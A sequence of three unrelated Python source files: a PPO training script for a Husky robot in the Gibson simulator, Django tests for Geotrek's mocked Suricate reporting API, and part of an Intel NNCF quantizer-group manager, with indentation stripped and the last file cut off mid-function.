# add parent dir to find package. Only needed for source code build, pip install doesn't need it.
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0, parentdir)
import gym, logging
from mpi4py import MPI
from gibson.envs.husky_env import HuskyGibsonFlagRunEnv
from baselines.common import set_global_seeds
from gibson.utils import pposgd_fuse
import baselines.common.tf_util as U
from gibson.utils import fuse_policy
from gibson.utils import utils
import datetime
from baselines import logger
from baselines import bench
import os.path as osp
import tensorflow as tf
import random
## Training code adapted from: https://github.com/openai/baselines/blob/master/baselines/ppo1/run_atari.py
def train(num_timesteps, seed):
rank = MPI.COMM_WORLD.Get_rank()
sess = utils.make_gpu_session(args.num_gpu)
sess.__enter__()
# sess = U.single_threaded_session()
#sess = utils.make_gpu_session(args.num_gpu)
#sess.__enter__()
#if args.meta != "":
# saver = tf.train.import_meta_graph(args.meta)
# saver.restore(sess, tf.train.latest_checkpoint('./'))
if rank == 0:
logger.configure()
else:
logger.configure(format_strs=[])
workerseed = seed + 10000 * MPI.COMM_WORLD.Get_rank()
set_global_seeds(workerseed)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'configs',
'husky_gibson_flagrun_train.yaml')
print(config_file)
env = HuskyGibsonFlagRunEnv(config = config_file, gpu_idx=args.gpu_idx)
print(env.sensor_space)
def policy_fn(name, ob_space, sensor_space, ac_space):
return fuse_policy.FusePolicy(name=name, ob_space=ob_space, sensor_space = sensor_space, ac_space=ac_space, save_per_acts=10000, hid_size=64, num_hid_layers=2, session=sess)
#env = bench.Monitor(env, logger.get_dir() and
# osp.join(logger.get_dir(), str(rank)))
#env.seed(workerseed)
gym.logger.setLevel(logging.WARN)
pposgd_fuse.learn(env, policy_fn,
max_timesteps=int(num_timesteps * 1.1),
timesteps_per_actorbatch=2048,
clip_param=0.2, entcoeff=0.01,
optim_epochs=4, optim_stepsize=1e-3, optim_batchsize=64,
gamma=0.99, lam=0.95,
schedule='linear',
save_name=args.save_name,
save_per_acts=50,
reload_name=args.reload_name
)
env.close()
def callback(lcl, glb):
# stop training if reward exceeds 199
total = sum(lcl['episode_rewards'][-101:-1]) / 100
totalt = lcl['t']
is_solved = totalt > 2000 and total >= -50
return is_solved
def main():
train(num_timesteps=10000000, seed=5)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--mode', type=str, default="RGB")
parser.add_argument('--num_gpu', type=int, default=1)
parser.add_argument('--gpu_idx', type=int, default=0)
parser.add_argument('--disable_filler', action='store_true', default=False)
parser.add_argument('--meta', type=str, default="")
parser.add_argument('--reload_name', type=str, default=None)
parser.add_argument('--save_name', type=str, default="flagrun_RGBD2")
args = parser.parse_args()
#assert (args.mode != "SENSOR"), "Currently PPO does not support SENSOR mode"
main()
|
<reponame>GeotrekCE/Geotrek
import io
import os
import uuid
from unittest import mock
from unittest.mock import MagicMock
from django.core import mail
from django.core.management import call_command
from django.test import TestCase
from django.test.utils import override_settings
from django.urls.base import reverse
from django.utils.translation import gettext_lazy as _
from mapentity.tests.factories import SuperUserFactory, UserFactory
from geotrek.authent.tests.factories import UserProfileFactory
from geotrek.common.models import Attachment
from geotrek.feedback.forms import ReportForm
from geotrek.feedback.helpers import SuricateMessenger, SuricateRequestManager
from geotrek.feedback.models import (AttachedMessage, Report, ReportActivity,
ReportProblemMagnitude, ReportStatus, WorkflowManager)
from geotrek.feedback.tests.factories import (ReportFactory,
ReportStatusFactory,
WorkflowManagerFactory)
SURICATE_REPORT_SETTINGS = {
"URL": "http://suricate.wsstandard.example.com/",
"ID_ORIGIN": "geotrek",
"PRIVATE_KEY_CLIENT_SERVER": "",
"PRIVATE_KEY_SERVER_CLIENT": "",
"AUTH": ("", ""),
}
SURICATE_MANAGEMENT_SETTINGS = {
"URL": "http://suricate.wsmanagement.example.com/",
"ID_ORIGIN": "geotrek",
"PRIVATE_KEY_CLIENT_SERVER": "",
"PRIVATE_KEY_SERVER_CLIENT": "",
"AUTH": ("", ""),
}
SURICATE_WORKFLOW_SETTINGS = {
"TIMER_FOR_WAITING_REPORTS_IN_DAYS": 6,
"TIMER_FOR_PROGRAMMED_REPORTS_IN_DAYS": 7,
"SURICATE_RELOCATED_REPORT_MESSAGE": "Le Signalement ne concerne pas le Département du Gard - Relocalisé hors du Département"
}
def mocked_json(file_name):
filename = os.path.join(os.path.dirname(__file__), "data", file_name)
with open(filename, "r") as f:
return bytes(f.read(), encoding="UTF-8")
def mocked_image(file_name):
filename = os.path.join(os.path.dirname(__file__), "data", file_name)
with open(filename, "rb") as f:
return bytearray(f.read())
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@override_settings(SURICATE_MANAGEMENT_SETTINGS=SURICATE_MANAGEMENT_SETTINGS)
class SuricateTests(TestCase):
"""Test Suricate API"""
def build_get_request_patch(self, mocked: MagicMock, cause_JPG_error=False, remove_one_alert=False):
"""Mock get requests to Suricate API"""
def build_response_patch(url, params=None, **kwargs):
mock_response = MagicMock()
if "GetActivities" in url:
mock_response.status_code = 200
mock_response.content = mocked_json("suricate_activities.json")
elif "GetStatusList" in url:
mock_response.status_code = 200
mock_response.content = mocked_json("suricate_statuses.json")
elif "GetAlerts" in url and not remove_one_alert:
mock_response.content = mocked_json("suricate_alerts.json")
mock_response.status_code = 200
elif "GetAlerts" in url and remove_one_alert:
mock_response.content = mocked_json("suricate_alerts_later.json")
mock_response.status_code = 200
elif "wsLockAlert" in url or "wsUnlockAlert" in url or "wsUpdateGPS" in url:
mock_response.content = mocked_json("suricate_positive.json")
mock_response.status_code = 200
elif cause_JPG_error:
mock_response.status_code = 404
elif ".jpg" in url or ".png" in url or ".JPG" in url:
mock_response.content = mocked_image("theme-fauna.png")
mock_response.status_code = 200
else:
mock_response.status_code = 404
return mock_response
mocked.side_effect = build_response_patch
def build_post_request_patch(self, mocked: MagicMock):
"""Mock post requests to Suricate API"""
def build_response_patch(url, params=None, **kwargs):
mock_response = MagicMock()
if "SendReport" in url or "UpdateStatus" in url or "MessageSentinel" in url:
mock_response.status_code = 200
mock_response.content = mocked_json(
"suricate_positive.json"
)
else:
mock_response.status_code = 404
return mock_response
mocked.side_effect = build_response_patch
def build_failed_request_patch(self, mocked: MagicMock):
"""Mock error responses from Suricate API"""
mock_response = mock.Mock()
mock_response.content = mocked_json("suricate_negative.json")
mock_response.status_code = 400
mocked.return_value = mock_response
def build_timeout_request_patch(self, mocked: MagicMock):
"""Mock error responses from Suricate API"""
mock_response = mock.Mock()
mock_response.status_code = 408 # reqest timeout
mock_response.content = {}
mocked.return_value = mock_response
@classmethod
def setUpTestData(cls):
cls.user = UserFactory()
UserProfileFactory.create(user=cls.user)
cls.workflow_manager = WorkflowManagerFactory(user=cls.user)
cls.admin = SuperUserFactory(username="Admin", password="<PASSWORD>")
def setUp(self):
self.client.force_login(self.admin)
class SuricateAPITests(SuricateTests):
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.logger")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_statuses(self, mocked_get, mocked_logger):
"""Test GET requests on Statuses endpoint creates statuses objects"""
self.build_get_request_patch(mocked_get)
call_command("sync_suricate", statuses=True)
self.assertEqual(ReportStatus.objects.count(), 5)
mocked_logger.info.assert_called_with("New status - id: classified, label: Classé sans suite")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.logger")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_activities(self, mocked_get, mocked_logger):
"""Test GET requests on Activities endpoint creates statuses objects"""
self.build_get_request_patch(mocked_get)
call_command("sync_suricate", activities=True)
self.assertEqual(ReportActivity.objects.count(), 32)
mocked_logger.info.assert_called_with("New activity - id: 51, label: Roller, Skateboard")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_activities_and_statuses(self, mocked):
"""Test GET requests on both Activities and Statuses endpoint creates objects"""
self.build_get_request_patch(mocked)
call_command("sync_suricate", activities=True, statuses=True)
self.assertEqual(ReportActivity.objects.count(), 32)
self.assertEqual(ReportStatus.objects.count(), 5)
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@mock.patch("geotrek.feedback.management.commands.sync_suricate.logger")
def test_command_disabled(self, mocked):
"""Test sync_suricate command is disabled when setting is False"""
call_command("sync_suricate", activities=True, statuses=True)
mocked.error.assert_called_with("To use this command, please activate setting SURICATE_MANAGEMENT_ENABLED or SURICATE_WORKFLOW_ENABLED.")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.logger")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_alerts_creates_alerts_and_send_mail(self, mocked_get, mocked_logger):
"""Test GET requests on Alerts endpoint creates alerts and related objects, and sends an email"""
self.build_get_request_patch(mocked_get, cause_JPG_error=True)
self.assertEqual(len(mail.outbox), 0)
call_command("sync_suricate", verbosity=2)
# 8 out of 9 are imported because one of them is out of bbox by design
self.assertEqual(Report.objects.count(), 8)
self.assertEqual(ReportProblemMagnitude.objects.count(), 3)
self.assertEqual(AttachedMessage.objects.count(), 44)
self.assertEqual(Attachment.objects.count(), 6)
self.assertEqual(len(mail.outbox), 1)
sent_mail = mail.outbox[0]
self.assertEqual(sent_mail.subject, "Geotrek - New reports from Suricate")
self.assertIn("New reports have been imported from Suricate", sent_mail.body)
self.assertIn("Please consult your reports in Geotrek-Admin", sent_mail.body)
for report in Report.objects.all():
self.assertIn(report.full_url, sent_mail.body)
r = Report.objects.all()[0]
r.category = None
r.save()
# Fetch it again to verify 'super.save' was called (management mode)
r.refresh_from_db()
self.assertIsNone(r.category)
# Test new filed report are not assigned to workflow manager when mode is management
r = Report.objects.get(external_uuid="E7C73347-5056-AA2B-DDBFDCD9328CD742")
self.assertIsNone(r.assigned_user)
# Assert no new mail on update
self.assertEqual(len(mail.outbox), 1)
# Test sync specific report overwrites local info
r.comment = ""
r.save()
r.refresh_from_db()
self.assertEquals(r.comment, "")
call_command("sync_suricate", report=r.pk, verbosity=2)
r.refresh_from_db()
self.assertEquals(r.comment, "Ne pas prendre la route Départementale 155 en direction de Malons")
# Test sync last report overwrites local info
r = Report.objects.get(external_uuid="7EE5DF25-5056-AA2B-DDBEEFA5768CD53E")
self.assertEquals(r.comment, "Lames cassées")
r.comment = ""
r.save()
r.refresh_from_db()
self.assertEquals(r.comment, "")
call_command("sync_suricate", report=0, verbosity=2)
r.refresh_from_db()
self.assertEquals(r.comment, "Lames cassées")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.ContentFile.__init__")
@mock.patch("geotrek.feedback.parsers.logger")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_sync_handles_malformed_images(self, mocked_get, mocked_logger, mocked_save):
self.build_get_request_patch(mocked_get)
"""Test Suricate sync is not interupted by corruped images"""
mocked_save.side_effect = Exception("This image is bad")
call_command("sync_suricate", verbosity=2)
mocked_logger.error.assert_called()
@override_settings(SURICATE_WORKFLOW_ENABLED=True)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_alerts_creates_alerts_and_send_mail_and_assign(self, mocked_get):
"""Test GET requests on Alerts endpoint creates alerts and related objects, and sends an email"""
self.build_get_request_patch(mocked_get, cause_JPG_error=True)
self.assertEqual(len(mail.outbox), 0)
call_command("sync_suricate", verbosity=2)
# 8 out of 9 are imported because one of them is out of bbox by design
self.assertEqual(Report.objects.count(), 8)
self.assertEqual(ReportProblemMagnitude.objects.count(), 3)
self.assertEqual(AttachedMessage.objects.count(), 44)
self.assertEqual(Attachment.objects.count(), 6)
self.assertEqual(len(mail.outbox), 1)
sent_mail = mail.outbox[0]
self.assertEqual(sent_mail.subject, "Geotrek - New reports from Suricate")
# Test update report does not send email and saves
r = Report.objects.all()[0]
r.category = None
r.save()
# Fetch it again to verify 'super.save' was called (management mode)
r.refresh_from_db()
self.assertIsNone(r.category)
# Test new filed report are assigned to workflow manager
r = Report.objects.get(external_uuid="E7C73347-5056-AA2B-DDBFDCD9328CD742")
self.assertIn(r.assigned_user.pk, list(WorkflowManager.objects.values_list('user', flat=True)))
# Assert no new mail on update
self.assertEqual(len(mail.outbox), 1)
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.logger")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_failed_attachments_are_downloaded_on_next_sync(self, mocked_get, mocked_logger):
"""Test failed requests to download attachments are retried on next sync"""
self.assertEqual(Attachment.objects.count(), 0)
# Fail to download all images
self.build_get_request_patch(mocked_get, cause_JPG_error=True)
call_command("sync_suricate", verbosity=2)
self.assertEqual(Attachment.objects.count(), 6)
for atta in Attachment.objects.all():
# All attachments are missing their image file
self.assertFalse(atta.attachment_file.name)
# Succesfully download all images
self.build_get_request_patch(mocked_get, cause_JPG_error=False)
call_command("sync_suricate", verbosity=2)
self.assertEqual(Attachment.objects.count(), 6)
for atta in Attachment.objects.all():
# No attachments are missing their image file
self.assertTrue(atta.attachment_file.name)
# Succesfully download all images a second time to cover "skip file" case
call_command("sync_suricate", verbosity=2)
self.assertEqual(Attachment.objects.count(), 6)
for atta in Attachment.objects.all():
# No attachments are missing their image file
self.assertTrue(atta.attachment_file.name)
@override_settings(PAPERCLIP_ENABLE_LINK=False)
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
def test_sync_needs_paperclip_enabled(self):
"""Test failed requests to download attachments are retried on next sync"""
with self.assertRaises(Exception):
call_command("sync_suricate", verbosity=2)
@override_settings(SURICATE_REPORT_ENABLED=True)
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@mock.patch("geotrek.feedback.helpers.SuricateMessenger.post_report")
def test_save_on_report_posts_to_suricate_in_report_mode(self, post_report):
"""Test post to suricate on save Report in Suricate Report Mode"""
report = Report.objects.create()
post_report.assert_called_once_with(report)
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@mock.patch("geotrek.feedback.helpers.SuricateMessenger.post_report")
def test_save_on_report_posts_to_suricate_in_management_mode(self, post_report):
"""Test post to suricate on save Report in Suricate Management Mode"""
# Create a report with an UID - emulates report from Suricate
uid = uuid.uuid4()
Report.objects.create(external_uuid=uid)
post_report.assert_not_called()
# Create a report with no UID - emulates new report from Geotrek
report = Report.objects.create(external_uuid=None)
post_report.assert_called_once_with(report)
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@override_settings(SURICATE_REPORT_ENABLED=False)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_save_on_report_doesnt_post_to_suricate_in_no_suricate_mode(self, post_report):
"""Test save does not post to suricate on save Report in No Suricate Mode"""
Report.objects.create()
post_report.assert_not_called()
@mock.patch("geotrek.feedback.helpers.requests.post")
def test_post_request_to_suricate(self, mock_post):
"""Test post request itself
Request post is mock
"""
# Create a report without saving it
report = ReportFactory.build()
# Define a mock response
self.build_post_request_patch(mock_post)
# Call the function with the report
result = SuricateMessenger().post_report(report)
self.assertEqual(result, None)
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_request_to_suricate_fails_1(self, mock_get):
"""Test get request itself fails
"""
# Mock error 408
self.build_timeout_request_patch(mock_get)
# Get raises an exception
with self.assertRaises(Exception):
SuricateRequestManager().get_suricate(endpoint="wsGetStatusList")
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_request_to_suricate_fails_2(self, mock_get):
"""Test get request itself fails
"""
# Mock error 400
self.build_failed_request_patch(mock_get)
# Get raises an exception
with self.assertRaises(Exception):
SuricateRequestManager().get_suricate(endpoint="wsGetStatusList")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("sys.stdout", new_callable=io.StringIO)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_connection_test(self, mock_get, mocked_stdout):
"""Assert connection test command outputs OK
"""
# Mock error 408
self.build_get_request_patch(mock_get)
call_command("sync_suricate", test=True)
# Assert outputs OK
self.assertEquals(mocked_stdout.getvalue(), 'API Standard :\nOK\nAPI Gestion :\nOK\n')
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("sys.stdout", new_callable=io.StringIO)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_connection_test_fails_API(self, mock_get, mocked_stdout):
"""Assert connection test command outputs error when it fails on Suricate API side
"""
# Mock negative response
self.build_failed_request_patch(mock_get)
# Assert outputs KO
call_command("sync_suricate", test=True)
self.assertEquals(mocked_stdout.getvalue(), "API Standard :\nKO - Status code: 400\nAPI Gestion :\nKO - Status code: 400\n")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("sys.stdout", new_callable=io.StringIO)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_connection_test_fails_HTTP(self, mock_get, mocked_stdout):
"""Assert connection test command outputs error when it fails on HTTP
"""
# Mock error 408
self.build_timeout_request_patch(mock_get)
# Assert outputs KO
call_command("sync_suricate", test=True)
self.assertEquals(mocked_stdout.getvalue(), "API Standard :\nKO - Status code: 408\nAPI Gestion :\nKO - Status code: 408\n")
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.logger")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_relocated_report_is_deleted_on_next_sync(self, mocked_get, mocked_logger):
"""Test reports relocated outside of BBOX are deleted on next sync"""
self.build_get_request_patch(mocked_get, remove_one_alert=False)
call_command("sync_suricate", verbosity=2)
# 8 out of 9 are imported because one of them is out of bbox by design
self.assertEqual(Report.objects.filter(external_uuid="742CBF16-5056-AA2B-DD1FD403F72D6B9B").count(), 1)
self.assertEqual(Report.objects.count(), 8)
"""Test GET requests on Alerts endpoint creates alerts and related objects, and sends an email"""
self.build_get_request_patch(mocked_get, remove_one_alert=True)
call_command("sync_suricate", verbosity=2)
# One out of the 9 was removed from response because this report now lives outside of BBOX according to Suricate
# 7 out of 8 are imported because one of them is out of bbox by design
self.assertEqual(Report.objects.filter(external_uuid="742CBF16-5056-AA2B-DD1FD403F72D6B9B").count(), 0)
self.assertEqual(Report.objects.count(), 7)
class SuricateInterfaceTests(SuricateTests):
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_import_from_interface_disabled(self, mocked):
user = UserFactory.create(username='Slush', password='<PASSWORD>')
self.client.force_login(user)
self.build_get_request_patch(mocked)
url = reverse('common:import_dataset')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, 'import-suricate')
self.assertNotContains(response, _('Data to import from Suricate'))
response = self.client.post(
url, {
'import-suricate': 'Import',
'parser': 'everything',
}
)
self.assertEqual(Report.objects.count(), 0)
@override_settings(SURICATE_MANAGEMENT_ENABLED=True)
@mock.patch("geotrek.feedback.parsers.SuricateParser.get_alerts")
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_import_from_interface_enabled(self, mocked_get, mocked_parser):
user = UserFactory.create(username='Slush', password='<PASSWORD>')
self.client.force_login(user)
# mocked_parser = mock.Mock()
self.build_get_request_patch(mocked_get)
url = reverse('common:import_dataset')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'import-suricate')
self.assertContains(response, _('Data to import from Suricate'))
response = self.client.post(
url, {
'import-suricate': 'Import',
'parser': 'everything',
}
)
self.assertEqual(response.status_code, 200)
mocked_parser.assert_called_once()
@override_settings(SURICATE_MANAGEMENT_ENABLED=False)
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@mock.patch("geotrek.feedback.helpers.requests.get")
def test_get_request_to_suricate_fails_1(self, mock_get):
"""Test get request itself fails
"""
# Mock error 408
self.build_timeout_request_patch(mock_get)
# Get raises an exception
with self.assertRaises(Exception):
SuricateRequestManager().get_suricate(endpoint="wsGetStatusList")
class SuricateWorkflowTests(SuricateTests):
fixtures = ['geotrek/maintenance/fixtures/basic.json']
@classmethod
def setUpTestData(cls):
SuricateTests.setUpTestData()
cls.filed_status = ReportStatusFactory(identifier='filed', label="Déposé")
cls.classified_status = ReportStatusFactory(identifier='classified', label="Classé sans suite")
cls.programmed_status = ReportStatusFactory(identifier='programmed', label="Programmé")
cls.waiting_status = ReportStatusFactory(identifier='waiting', label="En cours")
cls.rejected_status = ReportStatusFactory(identifier='rejected', label="Rejeté")
cls.late_intervention_status = ReportStatusFactory(identifier='late_intervention', label="Intervention en retard")
cls.late_resolution_status = ReportStatusFactory(identifier='late_resolution', label="Resolution en retard")
cls.solved_intervention_status = ReportStatusFactory(identifier='solved_intervention', label="Intervention terminée")
cls.resolved_status = ReportStatusFactory(identifier='solved', label="Résolu")
cls.report = ReportFactory(status=cls.filed_status, external_uuid=uuid.uuid4())
cls.admin = SuperUserFactory(username="Admiin", password="<PASSWORD>")
cls.interv_report = ReportFactory(status=cls.programmed_status)
def raise_multiple(exceptions):
if not exceptions: # list emptied, recursion ends
return
try:
raise exceptions.pop() # pop removes list entries
finally:
raise_multiple(exceptions) # recursion
def test_for_all_suricate_modes(test_func):
def inner(self, *args, **kwargs):
exceptions = []
try:
with override_settings(SURICATE_REPORT_ENABLED=False, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'No Suricate' mode",)
exceptions.append(e)
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Report' mode",)
exceptions.append(e)
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Management' mode",)
exceptions.append(e)
try:
with override_settings(SURICATE_REPORT_ENABLED=False, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=True, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Workflow' mode",)
exceptions.append(e)
raise_multiple(exceptions)
return inner
def test_for_report_and_basic_modes(test_func):
def inner(self, *args, **kwargs):
exceptions = []
try:
with override_settings(SURICATE_REPORT_ENABLED=False, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'No Suricate' mode",)
exceptions.append(e)
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Report' mode",)
exceptions.append(e)
raise_multiple(exceptions)
return inner
def test_for_management_and_workflow_modes(test_func):
def inner(self, *args, **kwargs):
exceptions = []
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Management' mode",)
exceptions.append(e)
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=True, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Workflow' mode",)
raise_multiple(exceptions)
return inner
def test_for_workflow_mode(test_func):
def inner(self, *args, **kwargs):
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=True, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Workflow' mode",)
raise
return inner
def test_for_management_mode(test_func):
def inner(self, *args, **kwargs):
try:
with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
test_func(self, *args, **kwargs)
except AssertionError as e:
e.args += ("Failed for 'Suricate Management' mode",)
raise
return inner
class TestWorkflowFirstSteps(SuricateWorkflowTests):
@classmethod
def setUpTestData(cls):
SuricateWorkflowTests.setUpTestData()
cls.report_filed_1 = ReportFactory(status=cls.filed_status, external_uuid=uuid.uuid4(), assigned_user=cls.admin)
cls.report_filed_2 = ReportFactory(status=cls.filed_status, external_uuid=uuid.uuid4(), assigned_user=cls.admin)
@override_settings(SURICATE_WORKFLOW_ENABLED=True)
@mock.patch("geotrek.feedback.helpers.requests.get")
@mock.patch("geotrek.feedback.helpers.requests.post")
@mock.patch("geotrek.feedback.helpers.SuricateMessenger.message_sentinel")
@mock.patch("geotrek.feedback.helpers.SuricateMessenger.update_status")
def test_classify_alert_notifies_suricate_when_workflow_enabled(self, mocked_notify_suricate_status, mocked_mail_sentinel, mocked_post, mocked_get):
form = ReportForm(
instance=self.report_filed_1,
data={
'geom': self.report_filed_1.geom,
'email': self.report_filed_1.email,
'status': self.classified_status.pk,
'message_sentinel': "Problème déjà réglé"
}
)
self.assertTrue(form.is_valid)
form.save()
mocked_mail_sentinel.assert_called_once_with(self.report_filed_1.formatted_external_uuid, "Problème déjà réglé")
mocked_notify_suricate_status.assert_called_once_with(self.report_filed_1.formatted_external_uuid, self.classified_status.identifier, "Problème déjà réglé")
@override_settings(SURICATE_WORKFLOW_ENABLED=False)
@mock.patch("geotrek.feedback.helpers.requests.get")
@mock.patch("geotrek.feedback.helpers.requests.post")
@mock.patch("geotrek.feedback.helpers.SuricateMessenger.message_sentinel")
@mock.patch("geotrek.feedback.helpers.SuricateMessenger.update_status")
def test_classify_alert_does_not_notify_suricate_when_workflow_disabled(self, mocked_notify_suricate_status, mocked_mail_sentinel, mocked_post, mocked_get):
form = ReportForm(
instance=self.report_filed_2,
data={
'geom': self.report_filed_2.geom,
'email': self.report_filed_2.email,
'status': self.classified_status.pk,
'message_sentinel': "Problème déjà réglé"
}
)
self.assertTrue(form.is_valid)
form.save()
mocked_mail_sentinel.assert_not_called()
mocked_notify_suricate_status.assert_not_called()
|
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from copy import copy
from typing import Dict
from typing import Optional
from typing import Set
from nncf.common.quantization.quantizer_propagation.structs import PropagatingQuantizer
class UnifiedScalePropagatingQuantizerGroupManager:
"""
Keeps track of the groups of quantizers that have to have their scales unified in the final
quantized model.
"""
def __init__(self):
self._next_gid = 0
self._group_vs_prop_quants_dict = {} # type: Dict[int, Set[PropagatingQuantizer]]
def _get_next_gid(self) -> int:
retval = self._next_gid
self._next_gid += 1
return retval
def register_group(self, prop_quants: Set[PropagatingQuantizer]) -> int:
"""
Registers a set of propagating quantizers as a new group.
:param prop_quants: A set of propagating quantizers to be registered.
:return: The ID of the newly created group.
"""
for pq in prop_quants:
for gid, group in self._group_vs_prop_quants_dict.items():
assert pq not in group, 'Propagating quantizer #{} is already registered in a group {}!'.format(pq.id,
gid)
gid = self._get_next_gid()
self._group_vs_prop_quants_dict[gid] = prop_quants
return gid
def add_to_group(self, target_gid: int, prop_quant: PropagatingQuantizer):
"""
Adds a propagating quantizer to an already existing group.
:param target_gid: The ID of the group to be extended.
:param prop_quant: The propagating quantizer to be registered in the group. The quantizer
must not be already registered in any group.
"""
for gid, group in self._group_vs_prop_quants_dict.items():
if target_gid != gid:
assert prop_quant not in group, 'Tried to add propagating quantizer #{} to group #{}, ' \
'but it is already registered in a group {}!'.format(prop_quant.id,
target_gid,
gid)
self._group_vs_prop_quants_dict[target_gid].add(prop_quant)
def remove_from_group(self, group: int, prop_quant: PropagatingQuantizer):
"""
Removes a propagating quantizer from a group.
:param group: The ID of the group from where a quantizer should be removed.
:param prop_quant: The propagating quantizer to be removed from the group.
"""
self._group_vs_prop_quants_dict[group].remove(prop_quant)
def get_group_vs_prop_quants_dict(self) -> Dict[int, Set[PropagatingQuantizer]]:
"""
:return: A dictionary of groups vs propagating quantizers currently associated with the corresponding group.
"""
return copy(self._group_vs_prop_quants_dict)
def get_group_id_by_propagating_quantizer_id(self, requested_pqid: int) -> Optional[int]:
"""
If a propagating quantizer with a given ID is registered within a group,
then this function will return the corresponding group ID; otherwise, None is returned.
:param requested_pqid: The ID of the propagating quantizer to search for among groups.
:return: The group ID of the quantizer, if found, otherwise None.
"""
for gid, group in self._group_vs_prop_quants_dict.items():
for pq in group:
